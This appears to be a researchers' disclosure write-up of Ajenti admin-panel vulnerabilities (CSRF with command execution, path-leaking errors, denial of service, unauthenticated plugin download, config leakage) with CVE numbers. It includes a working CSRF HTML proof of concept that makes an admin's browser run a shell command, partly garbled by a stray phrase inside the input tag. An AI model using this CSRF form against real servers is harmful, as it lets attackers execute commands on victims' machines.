Security Issues on Ajenti.
Researching the platform, me, Edward Amaral and my coworker Daniel Chactoura, security researchers from Stone Payments found some security issues on the Admin panel by Ajenti.
Those Vulnerabilities were:
- Multiple CSRF with Remote Code Execution
- Inproper Error Handling
- Denial of Service
- Security Misconfiguration
CSRF With RCE
The CSRF was the first thing that we were looking for in the platform. because in tools like that, authentication bypass and CRSFs are the vulnerabilities that has the higher level of severity.
Well, let’s explain what we’ve done.
The CSRF occoured in several requisitions, we will explain the https://<IP>/api/terminal/create path.
With this CSRF we can make the admin of the server execute any command we want.
We created the code below to make the PoC . It creates a directory named Test=CSRF_PoC in the Desktop of the server.
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://172.16.3.117:8000/api/terminal/create" method=”POST” enctype=”text/plain”>
<inpAs being a admin onlyut type=”hidden” name=”{"command":"mkdir /home/edward/Desktop/Test” value=”CSRF_POC","autoclose":"true"}” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Improper Error Handling
There’s a traceback error that occours when the request sends a malformed JSON as data to the login requisition. With that JSON the server responds with paths related to the server machine .
The JSON sent was {“username”:”User”,”password”:”P4ssw0rd”,”mode”:”normal”}=-
The equal sign that makes the JSON malformed, and forces the server to respond with an error message that show the path related to the tool on the server.
Denial Of Service
This attack was found on the Get information requisition. We found that by changing the name of the sensor, the server responds with its name, and the string does not have any size control. When we saw that, the first thing that comes to mind is to Flood the server with a GIANT string, and that’s what we’ve done. The server frooze as it was expected.
Security Misconfiguration
On the second day of testing we were testing the permissions of the tool, as it’s expected, the application has several features that are only useable if you have superuser privledges on the tool,
And we found that we can make the requisition of downloading the application plugins without being an admin of the server. That gains a lot of severity points because it can download a plugin that has a known vulnerability, to gain access to the server machine.
Research Update.
After further researching on the platform, me, Lucas Carmo, found another issue, that causes an information disclosure.
While conducting a vulnerability research on the application, i’ve started a code enumeration to understand how the application works. With this, I identified an information disclosure in the source code of the login page, that returns valuable information such as: operational system of the server, and the username of the Super user registered by the administrator of the server(super users are users that are allowed to use sudo command). Studying the application, i saw that this information comes from the /etc/ajenti/config.yml and this is imported by the angularJS on source code.
The source Code:
<script>
angular.module(‘core’).constant(‘urlPrefix’, ‘’);
angular.module(‘core’).constant(‘ajentiPlugins’, {“core”: “Core”, “ace”: “Ace editor”, “settings”: “Settings”, “passwd”: “User DB API”, “notepad”: “Notepad”, “plugins”: “Plugins”, “filemanager”: “File Manager”, “terminal”: “Terminal”, “dashboard”: “Dashboard”, “filesystem”: “Filesystem API”, “services”: “Services”, “packages”: “Packages”});
angular.module(‘core’).constant(‘initialConfigContent’, {“ssl”: {“client_auth”: {“certificates”: [], “enable”: false, “force”: false}, “enable”: false, “certificate”: null}, “max_sessions”: 9, “name”: “ubuntu”, “language”: “en”, “color”: “default”, “bind”: {“host”: “0.0.0.0”, “mode”: “tcp”, “port”: 8000}, “auth”: {“allow_sudo”: true, “emails”: {}, “provider”: “os”}, “restricted_user”: “root”});
angular.module(‘core’).constant(‘ajentiPlatform’, ‘debian’);
angular.module(‘core’).constant(‘ajentiPlatformUnmapped’, ‘ubuntu’);
angular.module(‘core’).constant(‘ajentiVersion’, ‘2.1.24’);
angular.module(‘core’).constant(‘ajentiBootstrapColor’, ‘default’);angular.element(document).ready(ajentiBootstrap);
</script>
CVES related to that issues:
- CVE-2018–1000080
- CVE-2018–1000081
- CVE-2018–1000082
- CVE-2018–1000083
- CVE-2018–1000126
